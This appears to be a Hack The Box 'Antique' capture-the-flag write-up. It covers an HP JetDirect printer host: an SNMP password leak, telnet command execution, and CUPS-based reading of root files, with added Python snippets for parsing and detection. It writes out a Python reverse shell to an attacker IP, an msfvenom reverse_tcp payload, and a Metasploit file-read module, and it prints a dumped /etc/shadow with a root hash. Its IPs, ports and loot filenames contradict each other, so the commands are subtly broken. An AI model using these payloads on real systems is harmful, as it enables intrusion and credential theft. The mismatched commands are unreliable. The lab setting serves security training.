Disclaimer
The hosts tested in this article are legally authorized targets. The tools and methods used in this article are only for learning and communication. Please do not use the tools and penetration testing ideas from this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.
Service detection
┌──(root💀kali)-[~/HTB/Antique]
└─# nmap -sV -Pn 10.10.11.88
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
Nmap scan report for 10.10.11.107
Host is up (0.39s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds
Port 23 is open with a Telnet-like service; connect with nc to take a look:
┌──(root💀kali)-[~/HTB/Antique]
└─# nc 10.10.11.88 8
HP JetDirect

ls
Password: 123456
Invalid Password
The banner is HP JetDirect, which I looked up and found to be an HP printer (print server).
Logging in over Telnet needs a password but no account name.
Googling for "HP JetDirect Telnet" turns up this article:
Following its method for getting a JetDirect password remotely through SNMP, we run the following:
┌──(root💀kali)-[~/HTB/Antique]
└─# snmpget -v 1 -c public 10.10.11.107 1.3.6.1.4.1.11.2.3.9.1.1.13.0
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
Paste the hex bytes above into a hex-to-text converter (Hex2text) and the password comes out as P@ssw0rd@123!!123
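To make clear what that single SNMP v1 read with the default "public" community returns, here is an added Python example (not part of the article) that parses a net-snmp BITS line. net-snmp prints the raw octets in hex and then the decimal positions of every set bit; since tokens such as "17" or "23" are valid in both parts, the parser finds the split point by checking that the trailing bit list matches the octets exactly, then decodes the octets as printable ASCII. The input line is a constructed copy of the snmpget output above, and the names (parse_bits_value, jetdirect_password) are this example's own.

```python
import re

# Constructed copy of the snmpget output shown above (net-snmp BITS formatting).
SNMPGET_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: "
    "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 "
    "1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 "
    "57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 "
    "122 123 126 130 131 134 135"
)

HEX_OCTET = re.compile(r"^[0-9A-Fa-f]{2}$")


def set_bit_positions(octets: bytes) -> list[int]:
    """Positions of the set bits, numbered the way SNMP BITS numbers them:
    bit 0 is the most significant bit of the first octet."""
    return [i * 8 + b
            for i, octet in enumerate(octets)
            for b in range(8)
            if octet & (0x80 >> b)]


def parse_bits_value(line: str) -> bytes:
    """Return the raw octets of a net-snmp 'BITS:' value.

    The hex octets and the decimal bit list share a token alphabet, so try
    every prefix length and keep the one whose set bits equal the suffix.
    """
    marker = " = BITS: "
    if marker not in line:
        raise ValueError("not a BITS value")
    tokens = line.split(marker, 1)[1].split()
    for k in range(len(tokens), 0, -1):
        head, tail = tokens[:k], tokens[k:]
        if not all(HEX_OCTET.match(t) for t in head):
            continue
        if not all(t.isdigit() for t in tail):
            continue
        octets = bytes(int(t, 16) for t in head)
        if [int(t) for t in tail] == set_bit_positions(octets):
            return octets
    raise ValueError("octets and bit list do not agree; output may be truncated")


def decode_text(octets: bytes) -> str:
    """Decode as printable ASCII; refuse control bytes so a bad split cannot
    silently turn into a plausible-looking string."""
    if not all(0x20 <= b < 0x7F for b in octets):
        raise ValueError("value is not printable ASCII")
    return octets.decode("ascii")


def jetdirect_password(line: str) -> str:
    """The text carried in the BITS value of this JetDirect OID."""
    return decode_text(parse_bits_value(line))


if __name__ == "__main__":
    print(jetdirect_password(SNMPGET_LINE))
```

The cross-check between octets and bit list is the useful part: it catches a truncated or mis-copied line instead of decoding garbage, and it is also how you can confirm that the "1 3 9 17 ..." tail is bit positions rather than more hex. From a defensive point of view, this is what any host that can reach UDP/161 on the printer with the read-only community string sees.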
Use the password above to log in to the Telnet interface:
┌──(root💀kali)-[~/HTB/Antique]
└─# nc 10.10.11.88 88
HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name  Type of value
ip:             IP-address in dotted notation
subnet-mask:    address in dotted notation (enter 0 for default)
default-gw:     address in dotted notation (enter 0 for default)
syslog-svr:     address in dotted notation (enter 0 for default)
idle-timeout:   seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name:      alpha-numeric string (upper case only, 32 chars max)
dhcp-config:    0 to disable, 1 to enable
allow:          <ip> [mask] (0 to clear, list to display, 10 max)
addrawport:     <TCP port num> (<TCP port num> 3000-9000)
deleterawport:  <TCP port num>
listrawport:    (No parameter required)
exec:           execute system commands (exec id)
exit:           quit from telnet session

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
> exec whoami
lp /var/spool/lpd
> exec find / -name user.txt
/home/lp/user.txt
/var/spool/lpd/user.txt
Privilege escalation
View system information
> exec uname -a
Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
> exec python3 --version
Python 3.8.10
Since python3 is installed, the following command gives us a more convenient reverse shell:
exec python3 -c 'import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.15",4242)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/sh")'
┌──(root💀kali)-[~/HTB/Antique]
└─# nc -lnvp 762
listening on [any] 762 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
$ id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
$
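The payload above works by dup2()-ing a connected socket onto fds 0, 1 and 2, which leaves a very recognisable fingerprint on the host. As an added example (not from the article), this Python script checks the standard fds of a process through /proc/<pid>/fd and flags any process whose stdin, stdout and stderr all resolve to the same socket; the function names and the constructed fd mappings in the test are this example's own. One caveat it handles in the comments: because the payload ends with pty.spawn, the /bin/sh child sits behind a pseudo-terminal and looks normal, so it is the python3 parent that gets flagged.

```python
import os


def stdio_targets(pid: int) -> dict[int, str]:
    """Resolve what fds 0, 1 and 2 of a process point at, via /proc/<pid>/fd/N.
    Unreadable entries (process gone, no permission) become empty strings."""
    targets = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            targets[fd] = ""
    return targets


def looks_like_reverse_shell(targets: dict[int, str]) -> bool:
    """True when stdin, stdout and stderr all resolve to one and the same
    socket, which is exactly what three dup2(s.fileno(), 0/1/2) calls produce.
    An interactive shell has /dev/pts/N here; a daemon has /dev/null, a pipe
    or a log file; a network service normally keeps its listening socket on a
    higher fd, not on all three standard ones.
    Note: with pty.spawn() the spawned /bin/sh has a pty on its stdio and is
    not flagged; the python3 parent holding the socket is."""
    links = [targets.get(fd, "") for fd in (0, 1, 2)]
    return all(link.startswith("socket:[") for link in links) and len(set(links)) == 1


def find_suspects(pids=None) -> list[int]:
    """Return the pids whose standard fds are socket-backed.  With no argument
    it walks /proc (Linux only); pass a list to check specific processes."""
    if pids is None:
        pids = [int(p) for p in os.listdir("/proc") if p.isdigit()]
    return [pid for pid in pids if looks_like_reverse_shell(stdio_targets(pid))]


if __name__ == "__main__":
    for pid in find_suspects():
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:
            comm = "?"
        print(f"pid {pid} ({comm}): stdio is a socket")
```

Run as root so every process's fd table is readable; unprivileged runs only see your own processes. The same idea is what `ss -tnp` plus a glance at `ls -l /proc/<pid>/fd` gives by hand, and it is cheap enough to schedule as a periodic check on hosts where no process should ever have socket-backed stdio.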
The lpadmin group looks suspicious and might be usable for privilege escalation. After googling, I found this article.
It says:
members of lpadmin can read every file on server via cups
Since members of this group can read any file on the system, I searched for an escalation script and found the MSF module multi/escalate/cups_root_file_read.
Let's generate an MSF reverse shell payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf
Transfer it to the target, run it, catch the session in MSF, and run the escalation module:
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.15:4444
[*] Sending stage (980808 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] found CUPS 1.6.1
[+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
[*] Cleaning up...
meterpreter > getuid
Check the /etc/shadow file
┌──(root💀kali)-[~/HTB/Antique]
└─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::
Edit it into a format that John can read (merge the hash back into the passwd entry with unshadow):
┌──(root💀kali)-[~/HTB/Antique]
└─# cat shadow.txt
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::

┌──(root💀kali)-[~/HTB/Antique]
└─# unshadow passwd.txt shadow.txt > unshadowed.txt

┌──(root💀kali)-[~/HTB/Antique]
└─# cat unshadowed.txt
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash
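The shadow dump above is worth reading as an auditor before reaching for John: only one account (root) has a real hash, everything else is locked with "*" or "!", and the third field says when each password was last changed. As an added example (not from the article), this Python script parses shadow(5) entries, reports per account whether a password login is possible, which crypt scheme protects it and the last-change date, and also performs the same field merge that unshadow does so the output format above can be checked. The shadow excerpt is a constructed copy of a few entries from the dump; the passwd line for root is constructed too, since the article's passwd.txt is not shown; the function names are this example's own.

```python
from datetime import date, timedelta

# Constructed excerpt of the /etc/shadow dump above (same entries, same fields).
SHADOW_SAMPLE = """\
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::
"""

# Constructed passwd entry for root (the article does not show passwd.txt).
PASSWD_SAMPLE = "root:x:0:0:root:/root:/bin/bash\n"

# crypt(3) scheme identifiers that appear between the first two '$' signs.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
             "y": "yescrypt", "2b": "bcrypt", "2y": "bcrypt"}

EPOCH = date(1970, 1, 1)  # shadow dates are days since this


def parse_shadow(text: str) -> dict[str, dict[str, str]]:
    """Split shadow(5) lines into their nine colon-separated fields."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries[f[0]] = {"hash": f[1], "lastchange": f[2], "min": f[3],
                         "max": f[4], "warn": f[5], "inactive": f[6],
                         "expire": f[7]}
    return entries


def classify(hash_field: str) -> str:
    """'locked' for '*' / '!' entries, 'empty' for a blank password field
    (login with no password), otherwise the crypt scheme name."""
    if hash_field == "":
        return "empty"
    if hash_field.startswith(("!", "*")):
        return "locked"
    if hash_field.startswith("$"):
        ident = hash_field.split("$")[1]
        return CRYPT_IDS.get(ident, f"crypt-${ident}$")
    return "descrypt"  # 13-character traditional DES hash


def audit_shadow(text: str) -> dict[str, dict]:
    """Per account: can a password login succeed, under which scheme, when was
    the password last changed, and does it ever expire."""
    report = {}
    for user, e in parse_shadow(text).items():
        kind = classify(e["hash"])
        changed = (EPOCH + timedelta(days=int(e["lastchange"]))).isoformat() \
            if e["lastchange"] else None
        report[user] = {
            "loginable": kind != "locked",
            "scheme": kind,
            "last_change": changed,
            "never_expires": e["max"] in ("", "99999"),
        }
    return report


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Put each account's shadow hash into field 2 of its passwd line,
    which is what unshadow(8) produces and what John reads."""
    hashes = {u: e["hash"] for u, e in parse_shadow(shadow_text).items()}
    out = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        f[1] = hashes.get(f[0], f[1])
        out.append(":".join(f))
    return "\n".join(out)


if __name__ == "__main__":
    for user, info in audit_shadow(SHADOW_SAMPLE).items():
        print(f"{user:18} {info['scheme']:12} login={info['loginable']} "
              f"changed={info['last_change']} never_expires={info['never_expires']}")
    print(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE))
```

On this box the audit narrows the cracking target to a single sha512crypt hash last changed in May 2021 with no expiry, and it would also flag the two real problems an administrator wants to know about: an empty password field, or a legacy descrypt or md5crypt hash on an account that can log in.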
But I can't crack the hash.
Next, go for root's id_rsa file by editing the MSF module:
msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit
Change line 46 to /root/.ssh/id_rsa
Save in the editor.
Download it to the local machine:
meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] found CUPS 1.6.1
[+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
[*] Cleaning up...
However, this file does not exist; what the module saved is the CUPS "Not Found" page instead of a key:
┌──(root💀kali)-[~]
└─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
	<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
	<TITLE>Not Found - CUPS v1.6.1</TITLE>
	<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
</HEAD>
<BODY>
<H1>Not Found</H1>
<P></P>
</BODY>
</HTML>
In the end we simply downloaded /root/root.txt to the local machine. Finished at 1:00 in the morning; that was the end of the penetration test.
meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
[*] Cleaning up...